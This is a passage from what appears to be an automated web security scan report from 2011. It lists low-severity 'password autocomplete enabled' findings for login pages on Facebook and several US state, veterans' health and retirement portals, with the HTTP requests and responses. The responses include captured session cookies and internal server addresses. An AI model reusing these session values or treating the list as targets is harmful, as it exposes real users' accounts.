<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

15.28. http://www.facebook.com/share.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /share.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /share.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=cFyQm; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.200.118
Connection: close
Date: Sat, 30 Apr 2011 12:32:12 GMT
Content-Length: 10404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="login_form_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1&amp;display=popup" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
</label><input type="password" class="inputpassword" id="pass" name="pass" value="" /></div>
...[SNIP]...

15.29. https://www.humanservices.state.pa.us/Compass.Web/CMHOM.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.humanservices.state.pa.us
Path:   /Compass.Web/CMHOM.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /Compass.Web/CMHOM.aspx HTTP/1.1
Host: www.humanservices.state.pa.us
Connection: keep-alive
Referer: http://www.budget.state.pa.us/portal/server.pt/community/current_and_proposed_commonwealth_budgets/4566
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=yr3x3j55tjb3vof0ovmzf2zt

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:41:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: LangCode=EN; path=/
Set-Cookie: Image=HomePagePhoto_5.jpg; path=/
Set-Cookie: HTTP_TARGET=https://www.humanservices.state.pa.us/compass.web/MenuItems/CPSystemCompatibility.aspx; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 52074


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
COMPASS
</tit
...[SNIP]...
<body class='bgBODY' marginheight="14px" marginwidth="14px" onload="P7_initPM( 1,2,1,8,0);" >
<form name="aspnetForm" method="post" action="https://www.humanservices.state.pa.us/siteminderagent/forms/login.fcc" id="aspnetForm">
<div>
...[SNIP]...
<br>
<input type="password" name="PASSWORD" id="PASSWORD" maxlength="14" style="width: 125px;" />
</td>
...[SNIP]...

15.30. https://www.humanservices.state.pa.us/siteminderagent/forms/calen2.fcc  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.humanservices.state.pa.us
Path:   /siteminderagent/forms/calen2.fcc

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /siteminderagent/forms/calen2.fcc HTTP/1.1
Host: www.humanservices.state.pa.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: LangCode=EN; Image=HomePagePhoto_5.jpg; HTTP_TARGET=https://www.humanservices.state.pa.us/compass.web/MenuItems/CPSystemCompatibility.aspx; ASP.NET_SessionId=yr3x3j55tjb3vof0ovmzf2zt;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS
Date: Sat, 30 Apr 2011 12:38:48 GMT
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-type: text/html

<!--SiteMinder Encoding=ISO-8859-1; -->
<!--//CALOG English Version-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>Welcome to the Pennsylvania Department of Pu
...[SNIP]...
<BODY onload=resetCredFields();>
<FORM name=Login action="" method=post>

       <INPUT TYPE=HIDDEN NAME="SMENC" VALUE="ISO-8859-1">
...[SNIP]...
<TD align=left>
   <INPUT id=PASSWORD tabIndex=2 type=password size=12 name=PASSWORD>
</TD>
...[SNIP]...

15.31. https://www.humanservices.state.pa.us/siteminderagent/forms/calen2.fcc  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.humanservices.state.pa.us
Path:   /siteminderagent/forms/calen2.fcc

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /siteminderagent/forms/calen2.fcc?TYPE=33554433&REALMOID=06-6bf57489-709c-4b0f-93ec-a014929f28e8&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-O6VbVPPZehMw7tYKEakzIbtfDivezVg7y1gUs6%2f9n8l%2b4LLrUZ9nu4dbQaUQ3GsX&TARGET=-SM-HTTPS%3a%2f%2fwww%2ehumanservices%2estate%2epa%2eus%2fCompass%2eWeb%2fOCOA%2fpgm%2fEN%2fCAPRD%2easpx%3faction%3dlogin%26language%3dEN HTTP/1.1
Host: www.humanservices.state.pa.us
Connection: keep-alive
Referer: https://www.humanservices.state.pa.us/Compass.Web/CMHOM.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=yr3x3j55tjb3vof0ovmzf2zt; LangCode=EN; Image=HomePagePhoto_5.jpg; HTTP_TARGET=https://www.humanservices.state.pa.us/compass.web/MenuItems/CPSystemCompatibility.aspx

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS
Date: Sat, 30 Apr 2011 00:59:02 GMT
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-type: text/html

<!--SiteMinder Encoding=ISO-8859-1; -->
<!--//CALOG English Version-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>Welcome to the Pennsylvania Department of Pu
...[SNIP]...
<BODY onload=resetCredFields();>
<FORM name=Login action="" method=post>

       <INPUT TYPE=HIDDEN NAME="SMENC" VALUE="ISO-8859-1">
...[SNIP]...
<TD align=left>
   <INPUT id=PASSWORD tabIndex=2 type=password size=12 name=PASSWORD>
</TD>
...[SNIP]...

15.32. https://www.myhealth.va.gov/mhv-portal-web/anonymous.portal  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.myhealth.va.gov
Path:   /mhv-portal-web/anonymous.portal

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /mhv-portal-web/anonymous.portal HTTP/1.1
Host: www.myhealth.va.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:37 GMT
Content-type: text/html; charset=UTF-8
Cache-Control: no-cache="set-cookie"
Pragma: No-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
X-wily-servlet: Clear appServerIp=10.224.43.30&agentName=mhvma_ms10b&servletName=PortalServlet&agentHost=vamhvapp16&agentProcess=WebLogic
Set-Cookie: JSESSIONID=KyLqN8DJhdxQkMWNBN5PPL1jpnXWpKnWSJfpSmHlbmxPZLbmfqt6!-587569185; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
X-wily-info: Clear guid=A66BDECC0AE02B1E0053836AAA14FF5A
Connection: close
Set-Cookie: TSd0b0d9=f8f48700ac5e28f4a998bfb011b276dc9b3028ce4c2a4a934dbc0308; Path=/
Content-Length: 22826


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>


   <head>


<title>My HealtheVet </title><meta name="bea-portal-me
...[SNIP]...
</h2>
<form action="https://www.myhealth.va.gov:443/mhv-portal-web/anonymous.portal;jsessionid=KyLqN8DJhdxQkMWNBN5PPL1jpnXWpKnWSJfpSmHlbmxPZLbmfqt6!-587569185?_nfpb=true&_windowLabel=loginPortlet_learnAbout&loginPortlet_learnAbout_actionOverride=%2Fgov%2Fva%2Fmed%2Fmhv%2Fusermgmt%2Fportlet%2Flogin%2Flogin&_pageLabel=learnAboutRightnavLoginPage" method="post">
<input type="hidden" name="loginPortlet_learnAboutorg.apache.struts.taglib.html.TOKEN" value="bebbcea1da25be17384aaf2c81368756">
...[SNIP]...
<br />
<input type="password" name="loginPortlet_learnAbout{actionForm.password}" id="loginPortlet_learnAbout.userPassword">
</div>
...[SNIP]...

15.33. https://www.nrsservicecenter.com/iApp/ret/cmd/RetLogin  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /iApp/ret/cmd/RetLogin

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /iApp/ret/cmd/RetLogin HTTP/1.1
Host: www.nrsservicecenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; WT_FPC=id=20b3a41e6b6b11701271304126947907:lv=1304126947907:ss=1304126947907; TLTHID=31A358A072C91072200781E018D630EF; MyNRSSite=Ohio457; TLTSID=2B79DD6E72C9107208B8A4861F3DF71F;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:42 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=EBB9219073261073022FCEC122287B10; Path=/; Domain=.nrsservicecenter.com
Set-Cookie: JSESSIONID=0001ACicLnN7eR8w5L7FAtdHBJX:13j9iupo2; Path=/
Set-Cookie: MyNRSCookie=724442563878733568483573357039674368684f2f666e524b777875572f7a39336c3047694975555635386d576950674d6554344c5953444d442b4a352b6549; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: private, no-cache=set-cookie
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 7645


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


   <html lang
...[SNIP]...
</h1>

<FORM action="./AppLogic+RetLogin" method="post" name="form">

   
       <p>
...[SNIP]...
<dd>
               <input type="password" size="15" name="password" id="password" />
           </dd>
...[SNIP]...

15.34. https://www.nrsservicecenter.com/iApp/ret/content/landing.do  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /iApp/ret/content/landing.do

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /iApp/ret/content/landing.do?Role=None&Site=Ohio457 HTTP/1.1
Host: www.nrsservicecenter.com
Connection: keep-alive
Referer: http://oh.gov/stateemployee/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:38:13 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=832510E672CA10722944D51D41D1E762; Path=/; Domain=.nrsservicecenter.com
Set-Cookie: TLTSID=832510E672CA10722944D51D41D1E762; Path=/; Domain=.nrsservicecenter.com
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0001PF1_bP7-IBZ42tEJzNaNTGe:13j9iuj6t; Path=/
Set-Cookie: MyNRSCookie=724442563878733568483444304d6f4450416e34524c754261686f56624c74417a4e4d3251564d3742725258754d5173714a5651334c7449472f736b684a63426642327971723849794f733d; Path=/
Set-Cookie: MyNRSSite=Ohio457; Expires=Tue, 27 Apr 2021 01:38:12 GMT; Path=/
Set-Cookie: MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; Path=/
Set-Cookie: MyNRSSite=Ohio457; Expires=Tue, 27 Apr 2021 01:38:12 GMT; Path=/
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 10263


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en" x
...[SNIP]...
</h2>

<form id="login" action="/iApp/ret/cmd/RetLogin?Role=EE" method="post">
       
<label for="username">
...[SNIP]...
</label>
<input id="password" type="password" name="password" size="20" maxlength="30"/>
       
<p>
...[SNIP]...

15.35. https://www.nrsservicecenter.com/iApp/ret/landing.do  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /iApp/ret/landing.do

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /iApp/ret/landing.do HTTP/1.1
Host: www.nrsservicecenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; WT_FPC=id=20b3a41e6b6b11701271304126947907:lv=1304126947907:ss=1304126947907; TLTHID=31A358A072C91072200781E018D630EF; MyNRSSite=Ohio457; TLTSID=2B79DD6E72C9107208B8A4861F3DF71F;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:45 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=EDEE6218732610730181C1E2C63083C9; Path=/; Domain=.nrsservicecenter.com
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0001mmfBFC8Kymw5lCom8cv4BX4:13j9iupo2; Path=/
Set-Cookie: MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; Path=/
Set-Cookie: MyNRSSite=Ohio457; Expires=Tue, 27 Apr 2021 12:40:59 GMT; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 10263


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en" x
...[SNIP]...
</h2>

<form id="login" action="/iApp/ret/cmd/RetLogin?Role=EE" method="post">
       
<label for="username">
...[SNIP]...
</label>
<input id="password" type="password" name="password" size="20" maxlength="30"/>
       
<p>
...[SNIP]...

15.36. https://www.nrsservicecenter.com/iApp/ret/showPage.do  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.nrsservicecenter.com
Path:   /iApp/ret/showPage.do

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /iApp/ret/showPage.do HTTP/1.1
Host: www.nrsservicecenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: MyNRSCookie=724442563878733568483573357039674368684f2f516152454779736c49786e796d542f666d69513965457877376c44447057662f5a6d554b2b4c4f694e797868486e4b6e4c4f4a566c303d; JSESSIONID=0001ZvssK2nhmoK-lfaLP856fhM:13j9iupo2; WT_FPC=id=20b3a41e6b6b11701271304126947907:lv=1304126947907:ss=1304126947907; TLTHID=31A358A072C91072200781E018D630EF; MyNRSSite=Ohio457; TLTSID=2B79DD6E72C9107208B8A4861F3DF71F;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:45 GMT
Server: IBM_HTTP_Server/6.1.0.27-PK91361 Apache/2.0.47 (Unix)
Set-Cookie: TLTHID=EDD8FB4E7326107300A08C7B1CB4C778; Path=/; Domain=.nrsservicecenter.com
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0001YFkAdRMz04gilI2jygmcFCj:13j9iupo2; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 8439


        <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xh
...[SNIP]...
</h2>

<form id="login" action="/iApp/ret/cmd/RetLogin?Role=EE" method="post">
       
<label for="username">
...[SNIP]...
</label>
<input id="username" type="password" name="password" size="20" maxlength="30"/>
       
<p>
...[SNIP]...

15.37. https://www.scsignon.sc.gov/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.scsignon.sc.gov
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.scsignon.sc.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=46765221.1304123778.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TS958e6e=a60dd0b93d6d6a398bb02da4c14832dc8f3c5cdacd73a69a4dbb60ae; __utma=46765221.1070895029.1304123778.1304123778.1304123778.1; __utmc=46765221; ASP.NET_SessionId=kamz5liey0e1wg45tlodrnev; __utmb=46765221.2.10.1304123778;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 30 Apr 2011 12:40:07 GMT
Connection: close
Content-Length: 38680
Set-Cookie: TS958e6e=b2ae68f55edcc23ee94ce2114343a9488f3c5cdacd73a69a4dbc0327; Path=/
Vary: Accept-Encoding


<!doctype html public "-//w3c//dtd html 4.01 transitional//en">
<html lang="en">
   <head>
       <title>
           Login
       </title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       
...[SNIP]...
<body id="Body" onload="placeFocus(document.MainForm, new Array('Skip1', 'Skip2', 'dnn$dnnSEARCH$txtSearch'));">
       <form name="MainForm" method="post" action="Login.aspx" language="javascript" onsubmit="javascript:return WebForm_OnSubmit();" id="MainForm">
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJODc5NjIxNzQyD2QWAmYPZBYCAggPZBYCAg4PZBYCAgMPZBYGAgkPD2QWAh4Hb25jbGljawU6aWYoUGFnZV9DbGllbnRWYWxpZGF0ZSgpKXtzaG93UmV0cmlldmVEaXY
...[SNIP]...
<td valign="middle"><input name="txtPassword:TextBox" type="password" maxlength="16" size="24" id="txtPassword_TextBox" tabindex="2" class="InputCheckChange" onkeydown="return MonitorHelpKey(event, 'txtPassword__ctl0');" /></td>
...[SNIP]...

15.38. https://www.scsignon.sc.gov/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.scsignon.sc.gov
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /?CallbackUrl=https://www3.sctax.org/eSales/procLogon.asp&ApplicationSId=ESales HTTP/1.1
Host: www.scsignon.sc.gov
Connection: keep-alive
Referer: https://www3.sctax.org/esales/startReg.asp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=46765221.1304123778.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=46765221.1070895029.1304123778.1304123778.1304123778.1; __utmc=46765221; __utmb=46765221.2.10.1304123778

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Set-Cookie: ASP.NET_SessionId=ebd1ut55m4lu1x55fpv0xleo; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 30 Apr 2011 01:06:55 GMT
Set-Cookie: TS958e6e=4cd4ad94e98f7572917d9abce2c0b8bffe6de3a44c3e21294dbb60b0; Path=/
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 15349


<!doctype html public "-//w3c//dtd html 4.01 transitional//en">
<html lang="en">
   <head>
       <title>DOR eSales Login</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">

...[SNIP]...
<body id="Body" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" onload="placeFocus(document.MainForm, new Array('Skip1', 'Skip2'));">
       <form name="MainForm" method="post" action="Login.aspx?CallbackUrl=https%3a%2f%2fwww3.sctax.org%2feSales%2fprocLogon.asp&amp;ApplicationSId=ESales" language="javascript" onsubmit="javascript:return WebForm_OnSubmit();" id="MainForm">
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJODc5NjIxNzQyD2QWAmYPZBYCAggPZBYCAggPZBYCAgMPZBYGAgkPD2QWAh4Hb25jbGljawU6aWYoUGFnZV9DbGllbnRWYWxpZGF0ZSgpKXtzaG93UmV0cmlldmVEaXY
...[SNIP]...
<td valign="middle"><input name="txtPassword:TextBox" type="password" maxlength="16" size="24" id="txtPassword_TextBox" tabindex="2" class="InputCheckChange" onkeydown="return MonitorHelpKey(event, 'txtPassword__ctl0');" /></td>
...[SNIP]...

15.39. https://www.scsignon.sc.gov/Login.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.scsignon.sc.gov
Path:   /Login.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /Login.aspx HTTP/1.1
Host: www.scsignon.sc.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=46765221.1304123778.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TS958e6e=a60dd0b93d6d6a398bb02da4c14832dc8f3c5cdacd73a69a4dbb60ae; __utma=46765221.1070895029.1304123778.1304123778.1304123778.1; __utmc=46765221; ASP.NET_SessionId=kamz5liey0e1wg45tlodrnev; __utmb=46765221.2.10.1304123778;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 30 Apr 2011 12:40:13 GMT
Connection: close
Content-Length: 38680
Set-Cookie: TS958e6e=aed2e7cc2d346bc41b1ac340bfeac58f8f3c5cdacd73a69a4dbc032e; Path=/
Vary: Accept-Encoding


<!doctype html public "-//w3c//dtd html 4.01 transitional//en">
<html lang="en">
   <head>
       <title>
           Login
       </title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       
...[SNIP]...
<body id="Body" onload="placeFocus(document.MainForm, new Array('Skip1', 'Skip2', 'dnn$dnnSEARCH$txtSearch'));">
       <form name="MainForm" method="post" action="Login.aspx" language="javascript" onsubmit="javascript:return WebForm_OnSubmit();" id="MainForm">
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJODc5NjIxNzQyD2QWAmYPZBYCAggPZBYCAg4PZBYCAgMPZBYGAgkPD2QWAh4Hb25jbGljawU6aWYoUGFnZV9DbGllbnRWYWxpZGF0ZSgpKXtzaG93UmV0cmlldmVEaXY
...[SNIP]...
<td valign="middle"><input name="txtPassword:TextBox" type="password" maxlength="16" size="24" id="txtPassword_TextBox" tabindex="2" class="InputCheckChange" onkeydown="return MonitorHelpKey(event, 'txtPassword__ctl0');" /></td>
...[SNIP]...

15.40. https://www.vermontjoblink.com/ada/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /ada/ HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:06:48 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
